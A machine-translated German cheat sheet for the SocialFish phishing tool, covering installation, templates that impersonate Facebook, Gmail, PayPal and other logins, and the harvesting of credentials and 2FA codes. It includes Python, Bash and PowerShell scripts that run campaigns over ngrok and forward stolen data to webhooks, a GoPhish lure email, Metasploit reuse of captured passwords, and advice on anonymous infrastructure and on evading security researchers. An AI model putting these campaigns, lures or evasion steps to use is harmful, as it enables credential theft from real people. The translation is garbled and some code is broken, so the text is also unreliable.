SocialFish Phishing Tool Cheat Blatt
Überblick
Soziales Fisch ist ein fortschrittliches Phishing-Tool und Informationssammler entwickelt von UndeadSec. Es ist spezialisiert auf Social Media Phishing-Angriffe und umfassende Informationssammlung, Bereitstellung automatisierter Phishing-Seiten-Generation, Echtzeit-Beglaubigung Ernte, und detaillierte Opfer Profiling. Soziales Fisch enthält integrierte Vorlagen für populäre Social Media Plattformen und unterstützt benutzerdefinierte Phishing-Seiten-Erstellung.
ZEIT Warnung: Dieses Tool ist nur für autorisierte Penetrationstests und rote Teamübungen gedacht. Stellen Sie sicher, dass Sie eine ordnungsgemäße Autorisierung vor der Verwendung gegen jedes Ziel haben.
Installation
Voraussetzungen
```bash
Install Python 3.6+ and pip
sudo apt update sudo apt install -y python3 python3-pip git
Install system dependencies
sudo apt install -y build-essential libssl-dev libffi-dev python3-dev
Verify Python installation
python3 --version ```_
Installation von GitHub
```bash
Clone SocialFish repository
git clone https://github.com/UndeadSec/SocialFish.git cd SocialFish
Install requirements
pip3 install -r requirements.txt
Make executable
chmod +x SocialFish.py ```_
Docker Installation
```bash
Clone repository
git clone https://github.com/UndeadSec/SocialFish.git cd SocialFish
Build Docker image
docker build -t socialfish .
Run SocialFish container
docker run -it --rm -p 5000:5000 socialfish
Run with persistent data
docker run -it --rm -p 5000:5000 -v $(pwd)/data:/app/data socialfish ```_
Manuelle Abhängigkeiten Installation
```bash
Install individual dependencies
pip3 install flask pip3 install requests pip3 install beautifulsoup4 pip3 install colorama pip3 install pyfiglet pip3 install urllib3
Install additional tools
sudo apt install -y ngrok # For public tunneling sudo apt install -y apache2 # Alternative web server ```_
Basisnutzung
Soziales Fische
```bash
Start SocialFish with default settings
python3 SocialFish.py
Start with custom port
python3 SocialFish.py --port 8080
Start with custom host
python3 SocialFish.py --host 0.0.0.0
Start in debug mode
python3 SocialFish.py --debug
Start with custom template directory
python3 SocialFish.py --templates /path/to/templates ```_
Kommandozeilenoptionen
```bash
SocialFish command line options
python3 SocialFish.py --help
Options: --port PORT Port to run the server (default: 5000) --host HOST Host to bind the server (default: 127.0.0.1) --debug Enable debug mode --templates DIR Custom templates directory --output DIR Output directory for logs and data --ngrok Enable ngrok tunneling --ssl Enable SSL/HTTPS ```_
Web Interface Zugriff
```bash
Access SocialFish web interface
http://localhost:5000
Access admin panel
http://localhost:5000/admin
View captured data
http://localhost:5000/logs
Download captured data
http://localhost:5000/download ```_
Eingebaute Vorlagen
Social Media Plattformen
```bash
Available social media templates
- Facebook Login
- Instagram Login
- Twitter Login
- LinkedIn Login
- Snapchat Login
- TikTok Login
- WhatsApp Web
- Telegram Web
- Discord Login
- Reddit Login ```_
Email und Cloud Services
```bash
Email service templates
- Gmail Login
- Outlook Login
- Yahoo Mail Login
- ProtonMail Login
Cloud service templates
- Google Drive
- Dropbox Login
- OneDrive Login
- iCloud Login ```_
Professional und Business
```bash
Business platform templates
- Microsoft Teams
- Slack Login
- Zoom Login
- Skype Login
- Adobe Creative Cloud
- Salesforce Login ```_
Spiele und Unterhaltung
```bash
Gaming platform templates
- Steam Login
- Epic Games
- PlayStation Network
- Xbox Live
- Twitch Login
- YouTube Login ```_
Finanzen und Einkaufen
```bash
Financial service templates
- PayPal Login
- Amazon Login
- eBay Login
- Netflix Login
- Spotify Login ```_
Projektleitung
Verwendung von integrierten Vorlagen
```bash
Select template from web interface
- Access http://localhost:5000
- Choose target platform
- Configure template settings
- Generate phishing page
- Start campaign
Command line template selection
python3 SocialFish.py --template facebook python3 SocialFish.py --template instagram python3 SocialFish.py --template gmail ```_
Benutzerdefinierte Vorlage Erstellung
```html
Forgot your password? Reset here
```_
Vorlagenkonfiguration
json
\\\\{
"template_name": "custom_platform",
"display_name": "Custom Platform Login",
"description": "Custom phishing template for specific platform",
"author": "Security Tester",
"version": "1.0",
"target_url": "https://custom-platform.com/login",
"redirect_url": "https://custom-platform.com/dashboard",
"files": \\\\{
"html": "custom_template.html",
"css": "custom_styles.css",
"js": "custom_script.js",
"images": ["logo.png", "background.jpg"]
\\\\},
"form_fields": [
\\\\{
"name": "username",
"type": "text",
"required": true,
"label": "Username or Email"
\\\\},
\\\\{
"name": "password",
"type": "password",
"required": true,
"label": "Password"
\\\\}
],
"additional_data": [
"user_agent",
"ip_address",
"geolocation",
"browser_info",
"screen_resolution"
]
\\\\}_
Kampagnenmanagement
Kampagnen erstellen
```bash
Web interface campaign creation
- Access admin panel: http://localhost:5000/admin
- Select "New Campaign"
- Choose template
- Configure settings:
- Campaign name
- Target URL
- Redirect URL
- Data collection options
- Generate phishing URL
- Start campaign ```_
Kampagnenkonfigurationsoptionen
```python
Campaign configuration example
campaign_config = \\{ "name": "Social Media Test Campaign", "template": "facebook", "target_platform": "Facebook", "redirect_url": "https://facebook.com", "data_collection": \\{ "credentials": True, "browser_info": True, "geolocation": True, "device_info": True, "session_data": True \\}, "security": \\{ "ip_filtering": ["192.168.1.0/24"], "user_agent_filtering": True, "geo_filtering": ["US", "CA", "GB"], "time_restrictions": \\{ "start_time": "09:00", "end_time": "17:00", "timezone": "UTC" \\} \\}, "notifications": \\{ "webhook_url": "https://your-server.com/webhook", "email_alerts": True, "slack_integration": True \\} \\} ```_
Erweiterte Kampagne Funktionen
```python
Multi-stage phishing campaign
multi_stage_config = \\{ "stages": [ \\{ "stage": 1, "template": "email_verification", "description": "Email verification page", "data_collection": ["email", "browser_info"], "redirect_to_stage": 2 \\}, \\{ "stage": 2, "template": "facebook_login", "description": "Facebook login page", "data_collection": ["credentials", "session_data"], "redirect_to_stage": 3 \\}, \\{ "stage": 3, "template": "2fa_verification", "description": "Two-factor authentication", "data_collection": ["2fa_code", "device_info"], "redirect_url": "https://facebook.com" \\} ] \\} ```_
Datenerhebung und -analyse
Datentypen erfassen
```bash
Credential data
- Username/Email
- Password
- Security questions
- PIN codes
- 2FA tokens
Browser information
- User Agent
- Browser version
- Installed plugins
- Screen resolution
- Operating system
Network information
- IP address
- Geolocation
- ISP information
- Proxy detection
- VPN detection
Device information
- Device type
- Hardware specs
- Mobile device info
- Battery level
- Network type
Behavioral data
- Mouse movements
- Keystroke patterns
- Time spent on page
- Click patterns
- Form interaction ```_
Echtzeitüberwachung
```python
Real-time data monitoring script
import requests import json import time from datetime import datetime
class SocialFishMonitor: def init(self, base_url="http://localhost:5000"): self.base_url = base_url self.last_check = datetime.now()
def get_captured_data(self):
"""Retrieve captured data from SocialFish"""
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/data")
if response.status_code == 200:
return response.json()
except Exception as e:
print(f"Error retrieving data: \\\\{e\\\\}")
return []
def monitor_new_captures(self):
"""Monitor for new captured data"""
while True:
data = self.get_captured_data()
new_captures = [
item for item in data
if datetime.fromisoformat(item['timestamp']) > self.last_check
]
for capture in new_captures:
self.process_new_capture(capture)
if new_captures:
self.last_check = datetime.now()
time.sleep(10)
def process_new_capture(self, capture):
"""Process new captured data"""
print(f"[+] New capture: \\\\{capture['type']\\\\}")
print(f" IP: \\\\{capture.get('ip_address', 'Unknown')\\\\}")
print(f" User Agent: \\\\{capture.get('user_agent', 'Unknown')\\\\}")
print(f" Timestamp: \\\\{capture['timestamp']\\\\}")
# Send notifications
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
webhook_url = "https://your-server.com/webhook"
payload = \\\\{
"text": f"New SocialFish capture from \\\\{capture.get('ip_address', 'Unknown')\\\\}",
"capture_data": capture
\\\\}
try:
requests.post(webhook_url, json=payload)
except Exception as e:
print(f"Failed to send notification: \\\\{e\\\\}")
def export_capture(self, capture):
"""Export captured data"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"capture_\\\\{timestamp\\\\}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: \\\\{filename\\\\}")
Usage
monitor = SocialFishMonitor() monitor.monitor_new_captures() ```_
Datenanalyse Werkzeuge
```python
Data analysis and reporting
import pandas as pd import matplotlib.pyplot as plt import seaborn as sns from collections import Counter
class SocialFishAnalyzer: def init(self, data_file): self.data = pd.read_json(data_file)
def analyze_geographic_distribution(self):
"""Analyze geographic distribution of victims"""
country_counts = Counter(self.data['country'])
plt.figure(figsize=(12, 6))
countries = list(country_counts.keys())[:10]
counts = list(country_counts.values())[:10]
plt.bar(countries, counts)
plt.title('Geographic Distribution of Phishing Victims')
plt.xlabel('Country')
plt.ylabel('Number of Victims')
plt.xticks(rotation=45)
plt.tight_layout()
plt.savefig('geographic_distribution.png')
plt.show()
def analyze_browser_usage(self):
"""Analyze browser usage patterns"""
browsers = []
for ua in self.data['user_agent']:
if 'Chrome' in ua:
browsers.append('Chrome')
elif 'Firefox' in ua:
browsers.append('Firefox')
elif 'Safari' in ua:
browsers.append('Safari')
elif 'Edge' in ua:
browsers.append('Edge')
else:
browsers.append('Other')
browser_counts = Counter(browsers)
plt.figure(figsize=(8, 8))
plt.pie(browser_counts.values(), labels=browser_counts.keys(), autopct='%1.1f%%')
plt.title('Browser Usage Distribution')
plt.savefig('browser_distribution.png')
plt.show()
def analyze_time_patterns(self):
"""Analyze time-based patterns"""
self.data['timestamp'] = pd.to_datetime(self.data['timestamp'])
self.data['hour'] = self.data['timestamp'].dt.hour
hourly_counts = self.data['hour'].value_counts().sort_index()
plt.figure(figsize=(12, 6))
plt.plot(hourly_counts.index, hourly_counts.values, marker='o')
plt.title('Phishing Activity by Hour of Day')
plt.xlabel('Hour of Day')
plt.ylabel('Number of Victims')
plt.grid(True)
plt.savefig('time_patterns.png')
plt.show()
def generate_report(self):
"""Generate comprehensive analysis report"""
report = \\\\{
'total_victims': len(self.data),
'unique_ips': self.data['ip_address'].nunique(),
'top_countries': dict(Counter(self.data['country']).most_common(5)),
'success_rate': len(self.data[self.data['credentials_captured'] == True]) / len(self.data) * 100,
'average_time_on_page': self.data['time_on_page'].mean(),
'mobile_percentage': len(self.data[self.data['device_type'] == 'mobile']) / len(self.data) * 100
\\\\}
return report
Usage
analyzer = SocialFishAnalyzer('captured_data.json') report = analyzer.generate_report() print(json.dumps(report, indent=2)) ```_
Automatisierung und Schrift
Python Automation Script
```python
!/usr/bin/env python3
SocialFish automation script
import requests import json import time import subprocess import threading from datetime import datetime
class SocialFishAutomation: def init(self, host="localhost", port=5000): self.base_url = f"http://\\{host\\}:\\{port\\}" self.process = None self.monitoring = False
def start_socialfish(self, template="facebook"):
"""Start SocialFish with specified template"""
cmd = [
"python3", "SocialFish.py",
"--host", "0.0.0.0",
"--port", str(self.port),
"--template", template
]
self.process = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
# Wait for server to start
time.sleep(10)
# Verify server is running
try:
response = requests.get(self.base_url, timeout=5)
if response.status_code == 200:
print("[+] SocialFish started successfully")
return True
except:
pass
print("[-] Failed to start SocialFish")
return False
def create_campaign(self, config):
"""Create new phishing campaign"""
try:
response = requests.post(f"\\\\{self.base_url\\\\}/api/campaign", json=config)
if response.status_code == 200:
campaign_data = response.json()
print(f"[+] Campaign created: \\\\{campaign_data['url']\\\\}")
return campaign_data
except Exception as e:
print(f"[-] Failed to create campaign: \\\\{e\\\\}")
return None
def get_phishing_url(self, campaign_id):
"""Get phishing URL for campaign"""
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/campaign/\\\\{campaign_id\\\\}")
if response.status_code == 200:
return response.json()['url']
except Exception as e:
print(f"[-] Failed to get phishing URL: \\\\{e\\\\}")
return None
def monitor_captures(self):
"""Monitor captured data in real-time"""
self.monitoring = True
last_count = 0
while self.monitoring:
try:
response = requests.get(f"\\\\{self.base_url\\\\}/api/captures")
if response.status_code == 200:
captures = response.json()
current_count = len(captures)
if current_count > last_count:
new_captures = captures[last_count:]
for capture in new_captures:
self.process_capture(capture)
last_count = current_count
time.sleep(5)
except Exception as e:
print(f"[-] Monitoring error: \\\\{e\\\\}")
time.sleep(10)
def process_capture(self, capture):
"""Process new captured data"""
print(f"[+] New victim: \\\\{capture.get('ip_address', 'Unknown')\\\\}")
# Extract credentials if available
if 'credentials' in capture:
username = capture['credentials'].get('username', 'N/A')
password = capture['credentials'].get('password', 'N/A')
print(f" Username: \\\\{username\\\\}")
print(f" Password: \\\\{'*' * len(password)\\\\}")
# Extract device information
if 'device_info' in capture:
device = capture['device_info']
print(f" Device: \\\\{device.get('type', 'Unknown')\\\\} - \\\\{device.get('os', 'Unknown')\\\\}")
print(f" Browser: \\\\{device.get('browser', 'Unknown')\\\\}")
# Send notification
self.send_notification(capture)
# Export data
self.export_capture(capture)
def send_notification(self, capture):
"""Send notification for new capture"""
# Slack notification
slack_webhook = "https://hooks.slack.com/services/YOUR/SLACK/WEBHOOK"
message = \\\\{
"text": f"🎣 New SocialFish Capture",
"attachments": [
\\\\{
"color": "good",
"fields": [
\\\\{
"title": "IP Address",
"value": capture.get('ip_address', 'Unknown'),
"short": True
\\\\},
\\\\{
"title": "Country",
"value": capture.get('country', 'Unknown'),
"short": True
\\\\},
\\\\{
"title": "User Agent",
"value": capture.get('user_agent', 'Unknown')[:50] + "...",
"short": False
\\\\}
]
\\\\}
]
\\\\}
try:
requests.post(slack_webhook, json=message)
except Exception as e:
print(f"[-] Failed to send Slack notification: \\\\{e\\\\}")
def export_capture(self, capture):
"""Export captured data to file"""
timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
filename = f"socialfish_capture_\\\\{timestamp\\\\}.json"
with open(filename, 'w') as f:
json.dump(capture, f, indent=2)
print(f"[+] Data exported to: \\\\{filename\\\\}")
def setup_ngrok_tunnel(self):
"""Setup ngrok tunnel for public access"""
try:
# Start ngrok tunnel
ngrok_process = subprocess.Popen([
"ngrok", "http", str(self.port)
], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
time.sleep(5)
# Get public URL
response = requests.get("http://localhost:4040/api/tunnels")
if response.status_code == 200:
tunnels = response.json()['tunnels']
if tunnels:
public_url = tunnels[0]['public_url']
print(f"[+] Public URL: \\\\{public_url\\\\}")
return public_url
except Exception as e:
print(f"[-] Failed to setup ngrok tunnel: \\\\{e\\\\}")
return None
def automated_campaign(self, templates, duration_hours=24):
"""Run automated multi-template campaign"""
print("[+] Starting automated SocialFish campaign...")
# Setup ngrok tunnel
public_url = self.setup_ngrok_tunnel()
campaigns = []
# Create campaigns for each template
for template in templates:
config = \\\\{
"template": template,
"name": f"Auto Campaign - \\\\{template\\\\}",
"redirect_url": f"https://\\\\{template.lower()\\\\}.com",
"data_collection": \\\\{
"credentials": True,
"browser_info": True,
"geolocation": True
\\\\}
\\\\}
campaign = self.create_campaign(config)
if campaign:
campaigns.append(campaign)
print(f"[+] \\\\{template\\\\} campaign URL: \\\\{public_url\\\\}\\\\{campaign['path']\\\\}")
# Start monitoring
monitor_thread = threading.Thread(target=self.monitor_captures)
monitor_thread.daemon = True
monitor_thread.start()
# Run for specified duration
print(f"[+] Campaign running for \\\\{duration_hours\\\\} hours...")
time.sleep(duration_hours * 3600)
# Stop monitoring
self.monitoring = False
print("[+] Campaign completed")
return campaigns
Usage example
def main(): automation = SocialFishAutomation()
# Start SocialFish
if automation.start_socialfish():
# Run automated campaign with multiple templates
templates = ["facebook", "instagram", "gmail", "linkedin"]
campaigns = automation.automated_campaign(templates, duration_hours=1)
print(f"[+] Completed \\\\{len(campaigns)\\\\} campaigns")
if name == "main": main() ```_
Bash Automation Script
```bash
!/bin/bash
SocialFish bash automation script
SOCIALFISH_DIR="/path/to/SocialFish" HOST="0.0.0.0" PORT="5000" TEMPLATE="facebook" DURATION="3600" # 1 hour in seconds
Function to start SocialFish
start_socialfish() \\{ echo "[+] Starting SocialFish..." cd "$SOCIALFISH_DIR"
python3 SocialFish.py --host "$HOST" --port "$PORT" --template "$TEMPLATE" &
SOCIALFISH_PID=$!
# Wait for server to start
sleep 10
# Check if server is running
if curl -s "http://localhost:$PORT" > /dev/null; then
echo "[+] SocialFish started successfully (PID: $SOCIALFISH_PID)"
return 0
else
echo "[-] Failed to start SocialFish"
return 1
fi
\\}
Function to setup ngrok tunnel
setup_ngrok() \\{ echo "[+] Setting up ngrok tunnel..." ngrok http "$PORT" & NGROK_PID=$!
sleep 5
# Get public URL
PUBLIC_URL=$(curl -s http://localhost:4040/api/tunnels|jq -r '.tunnels[0].public_url')
if [ "$PUBLIC_URL" != "null" ] && [ -n "$PUBLIC_URL" ]; then
echo "[+] Public URL: $PUBLIC_URL"
echo "$PUBLIC_URL" > ngrok_url.txt
return 0
else
echo "[-] Failed to get ngrok URL"
return 1
fi
\\}
Function to monitor captures
monitor_captures() \\{ echo "[+] Starting capture monitoring..."
while true; do
# Check for new captures
CAPTURE_COUNT=$(curl -s "http://localhost:$PORT/api/captures"|jq length)
if [ "$CAPTURE_COUNT" -gt 0 ]; then
echo "[+] $CAPTURE_COUNT capture(s) detected"
# Export latest capture
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
curl -s "http://localhost:$PORT/api/captures" > "captures_$TIMESTAMP.json"
echo "[+] Captures exported to: captures_$TIMESTAMP.json"
fi
sleep 30
done
\\}
Function to cleanup
cleanup() \\{ echo "[+] Cleaning up..."
if [ -n "$SOCIALFISH_PID" ]; then
kill "$SOCIALFISH_PID" 2>/dev/null
echo "[+] SocialFish stopped"
fi
if [ -n "$NGROK_PID" ]; then
kill "$NGROK_PID" 2>/dev/null
echo "[+] Ngrok tunnel stopped"
fi
exit 0
\\}
Set trap for cleanup
trap cleanup SIGINT SIGTERM
Main execution
main() \\{ echo "[+] SocialFish Automation Script" echo "[+] Template: $TEMPLATE" echo "[+] Duration: $DURATION seconds"
# Start SocialFish
if start_socialfish; then
# Setup ngrok tunnel
if setup_ngrok; then
# Start monitoring in background
monitor_captures &
MONITOR_PID=$!
# Run for specified duration
echo "[+] Campaign running for $DURATION seconds..."
sleep "$DURATION"
# Stop monitoring
kill "$MONITOR_PID" 2>/dev/null
echo "[+] Campaign completed"
fi
fi
cleanup
\\}
Execute main function
main ```_
PowerShell Automation
```powershell
SocialFish PowerShell automation script
param( [string]$SocialFishPath = "C:\Tools\SocialFish", [string]$Host = "0.0.0.0", [int]$Port = 5000, [string]$Template = "facebook", [int]$DurationMinutes = 60 )
function Start-SocialFish \\{ param( [string]$Path, [string]$Host, [int]$Port, [string]$Template )
Write-Host "[+] Starting SocialFish..." -ForegroundColor Green
Set-Location $Path
$process = Start-Process -FilePath "python" -ArgumentList @(
"SocialFish.py",
"--host", $Host,
"--port", $Port,
"--template", $Template
) -PassThru -WindowStyle Hidden
# Wait for server to start
Start-Sleep -Seconds 10
# Check if server is running
try \\\\{
$response = Invoke-WebRequest -Uri "http://localhost:$Port" -TimeoutSec 5
if ($response.StatusCode -eq 200) \\\\{
Write-Host "[+] SocialFish started successfully (PID: $($process.Id))" -ForegroundColor Green
return $process
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Failed to start SocialFish" -ForegroundColor Red
return $null
\\\\}
\\}
function Start-NgrokTunnel \\{ param([int]$Port)
Write-Host "[+] Setting up ngrok tunnel..." -ForegroundColor Green
$ngrokProcess = Start-Process -FilePath "ngrok" -ArgumentList @("http", $Port) -PassThru -WindowStyle Hidden
Start-Sleep -Seconds 5
try \\\\{
$tunnelInfo = Invoke-RestMethod -Uri "http://localhost:4040/api/tunnels"
$publicUrl = $tunnelInfo.tunnels[0].public_url
if ($publicUrl) \\\\{
Write-Host "[+] Public URL: $publicUrl" -ForegroundColor Green
$publicUrl|Out-File -FilePath "ngrok_url.txt"
return @\\\\{
Process = $ngrokProcess
Url = $publicUrl
\\\\}
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Failed to get ngrok URL" -ForegroundColor Red
\\\\}
return $null
\\}
function Monitor-Captures \\{ param( [int]$Port, [int]$DurationMinutes )
Write-Host "[+] Starting capture monitoring for $DurationMinutes minutes..." -ForegroundColor Green
$endTime = (Get-Date).AddMinutes($DurationMinutes)
$lastCaptureCount = 0
while ((Get-Date) -lt $endTime) \\\\{
try \\\\{
$captures = Invoke-RestMethod -Uri "http://localhost:$Port/api/captures"
$currentCount = $captures.Count
if ($currentCount -gt $lastCaptureCount) \\\\{
$newCaptures = $currentCount - $lastCaptureCount
Write-Host "[+] $newCaptures new capture(s) detected" -ForegroundColor Yellow
# Export captures
$timestamp = Get-Date -Format "yyyyMMdd_HHmmss"
$filename = "captures_$timestamp.json"
| $captures | ConvertTo-Json -Depth 10 | Out-File -FilePath $filename | Write-Host "[+] Captures exported to: $filename" -ForegroundColor Green
$lastCaptureCount = $currentCount
\\\\}
\\\\}
catch \\\\{
Write-Host "[-] Error monitoring captures: $_" -ForegroundColor Red
\\\\}
Start-Sleep -Seconds 30
\\\\}
Write-Host "[+] Monitoring completed" -ForegroundColor Green
\\}
function Stop-Processes \\{ param( [System.Diagnostics.Process]$SocialFishProcess, [System.Diagnostics.Process]$NgrokProcess )
Write-Host "[+] Cleaning up..." -ForegroundColor Green
if ($SocialFishProcess -and !$SocialFishProcess.HasExited) \\\\{
$SocialFishProcess.Kill()
Write-Host "[+] SocialFish stopped" -ForegroundColor Green
\\\\}
if ($NgrokProcess -and !$NgrokProcess.HasExited) \\\\{
$NgrokProcess.Kill()
Write-Host "[+] Ngrok tunnel stopped" -ForegroundColor Green
\\\\}
\\}
Main execution
try \\{ Write-Host "[+] SocialFish PowerShell Automation" -ForegroundColor Cyan Write-Host "[+] Template: $Template" -ForegroundColor Cyan Write-Host "[+] Duration: $DurationMinutes minutes" -ForegroundColor Cyan
# Start SocialFish
$socialFishProcess = Start-SocialFish -Path $SocialFishPath -Host $Host -Port $Port -Template $Template
if ($socialFishProcess) \\\\{
# Setup ngrok tunnel
$ngrokInfo = Start-NgrokTunnel -Port $Port
if ($ngrokInfo) \\\\{
# Monitor captures
Monitor-Captures -Port $Port -DurationMinutes $DurationMinutes
# Cleanup
Stop-Processes -SocialFishProcess $socialFishProcess -NgrokProcess $ngrokInfo.Process
\\\\}
else \\\\{
Stop-Processes -SocialFishProcess $socialFishProcess
\\\\}
\\\\}
\\} catch \\{ Write-Host "[-] Script error: $" -ForegroundColor Red \\} finally \\{ Write-Host "[+] Script completed" -ForegroundColor Green \\} ```
Integration mit anderen Tools
GoPhys Integration
```python
Integrate SocialFish with GoPhish for email delivery
import requests import json
class GoPhishSocialFishIntegration: def init(self, gophish_url, gophish_api_key, socialfish_url): self.gophish_url = gophish_url self.gophish_api_key = gophish_api_key self.socialfish_url = socialfish_url self.headers = \\{ 'Authorization': f'Bearer \\{gophish_api_key\\}', 'Content-Type': 'application/json' \\}
def create_gophish_campaign(self, socialfish_campaign_url):
"""Create GoPhish campaign with SocialFish URL"""
campaign_data = \\\\{
"name": "SocialFish Integration Campaign",
"template": \\\\{
"name": "Social Media Login Required",
"subject": "Action Required: Verify Your Account",
"html": f"""
<html>
<body>
<h2>Account Verification Required</h2>
<p>We've detected unusual activity on your account. Please verify your identity to continue using our services.</p>
<p><a href="\\\\{socialfish_campaign_url\\\\}" style="background-color: #4CAF50; color: white; padding: 14px 20px; text-decoration: none; display: inline-block;">Verify Account</a></p>
<p>If you did not request this verification, please ignore this email.</p>
</body>
</html>
""",
"text": f"Please verify your account by visiting: \\\\{socialfish_campaign_url\\\\}"
\\\\},
"page": \\\\{
"name": "Social Media Landing",
"html": f'<script>window.location.href="\\\\{socialfish_campaign_url\\\\}";</script>',
"redirect_url": socialfish_campaign_url
\\\\},
"smtp": \\\\{
"name": "Default SMTP",
"host": "smtp.gmail.com:587",
"username": "your_email@gmail.com",
"password": "your_app_password"
\\\\},
"groups": [
\\\\{
"name": "Target Group",
"targets": [
\\\\{"email": "target1@example.com", "first_name": "John", "last_name": "Doe"\\\\},
\\\\{"email": "target2@example.com", "first_name": "Jane", "last_name": "Smith"\\\\}
]
\\\\}
]
\\\\}
response = requests.post(
f"\\\\{self.gophish_url\\\\}/api/campaigns",
headers=self.headers,
json=campaign_data
)
return response.json()
Usage
integration = GoPhishSocialFishIntegration( "http://localhost:3333", "your_gophish_api_key", "http://your-socialfish-url.com" )
campaign = integration.create_gophish_campaign("http://your-socialfish-url.com/facebook") ```_
SET Integration
```bash
Social Engineering Toolkit integration
Use SET for payload delivery after credential capture
SET configuration for SocialFish integration
echo " [+] SET Integration with SocialFish 1. Use SocialFish for credential harvesting 2. Use SET for payload delivery post-compromise 3. Combine social media phishing with malware delivery "
Example SET payload generation
setoolkit
Select: Social-Engineering Attacks
Select: Website Attack Vectors
Select: Credential Harvester Attack Method
Select: Custom Import
Import SocialFish captured credentials
```_
Metasploit Integration
```bash
Use captured credentials in Metasploit modules
After SocialFish captures credentials, use them for further exploitation
Example: Use captured email credentials
use auxiliary/scanner/http/owa_login set RHOSTS target-mail-server.com set USERNAME captured_username@company.com set PASSWORD captured_password run
Example: Use captured social media tokens
use auxiliary/gather/facebook_api set ACCESS_TOKEN captured_facebook_token run ```_
Operationelle Sicherheit
Sicherheit der Infrastruktur
```bash
Use VPS with anonymous payment
Implement proxy chains
Use domain fronting
Regular infrastructure rotation
Example secure deployment
1. Purchase VPS with cryptocurrency
2. Setup through Tor/VPN
3. Use legitimate domain names
4. Implement SSL certificates
5. Configure proper logging
```_
Verkehrsobfukation
```bash
Use legitimate SSL certificates
Implement realistic timing delays
Use common ports (80, 443)
Mimic legitimate traffic patterns
Example nginx configuration for traffic obfuscation
server \\{ listen 443 ssl; server_name legitimate-looking-domain.com;
ssl_certificate /path/to/legitimate/cert.pem;
ssl_certificate_key /path/to/legitimate/key.pem;
location / \\\\{
proxy_pass http://localhost:5000;
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
\\\\}
\\} ```_
Anti-Detektionsmaßnahmen
```python
Implement anti-detection features
anti_detection_config = \\{ "user_agent_filtering": True, "ip_geolocation_filtering": True, "security_tool_detection": True, "honeypot_detection": True, "timing_randomization": True, "content_randomization": True \\}
Example anti-detection implementation
def detect_security_tools(user_agent, ip_address): """Detect security tools and researchers""" security_indicators = [ 'curl', 'wget', 'python-requests', 'scanner', 'bot', 'crawler', 'security', 'research' ]
for indicator in security_indicators:
if indicator.lower() in user_agent.lower():
return True
# Check for known security company IP ranges
security_ip_ranges = [
'192.168.1.0/24', # Example security company range
'10.0.0.0/8' # Example research network
]
# Implementation would check IP against ranges
return False
```_
Fehlerbehebung
Gemeinsame Themen
```bash
Port already in use
sudo netstat -tulpn|grep :5000 sudo kill -9 $(sudo lsof -t -i:5000)
Python dependency issues
pip3 install --upgrade -r requirements.txt
Template not loading
Check template file permissions
Verify template syntax
Check Flask template directory
Ngrok tunnel issues
Check ngrok authentication
Verify port forwarding
Test local connectivity first
```_
Debug Mode
```bash
Enable debug logging
python3 SocialFish.py --debug
Check Flask logs
tail -f socialfish.log
Test template rendering
curl -v http://localhost:5000/facebook
Verify API endpoints
curl http://localhost:5000/api/captures ```_
Best Practices
Kampagnenplanung
- Zielforschung: Zieldemografiken und Social Media Nutzung verstehen
- Auswahl: Wählen Sie entsprechende Vorlagen für das Zielpublikum
- *Infrastruktur-Setup: Verwenden Sie sicheres und anonymes Hosting
- Test: Vollständige Testvorlagen vor dem Einsatz
- Monitoring: Implementieren Echtzeit-Capture Monitoring
Rechtliche und ethische Überlegungen
```bash
Authorized testing only
Obtain proper written authorization
Follow responsible disclosure
Protect captured data
Document all activities
Data protection measures
Encrypt captured credentials
Secure data transmission
Implement data retention policies
Regular security audits
```_
Leistungsoptimierung
```bash
Optimize for high traffic
Use CDN for static content
Implement caching
Monitor server resources
Scale horizontally if needed
Example performance monitoring
htop iotop netstat -tulpn df -h ```_
Ressourcen
- SocialFish GitHub Repository
- [UndeadSec Security Research](LINK_5___ -%20[Flask-Dokumentation](__LINK_5 -%20(__LINK_5___)
- [Anti-Phishing-Arbeitsgruppe](_LINK_5__
--
*Dieses Betrügereiblatt bietet eine umfassende Referenz für die Verwendung von SocialFish Phishing Tool. Stellen Sie immer sicher, dass Sie eine ordnungsgemäße Autorisierung haben, bevor Sie Phishing-Simulationen oder Penetrationstests durchführen. *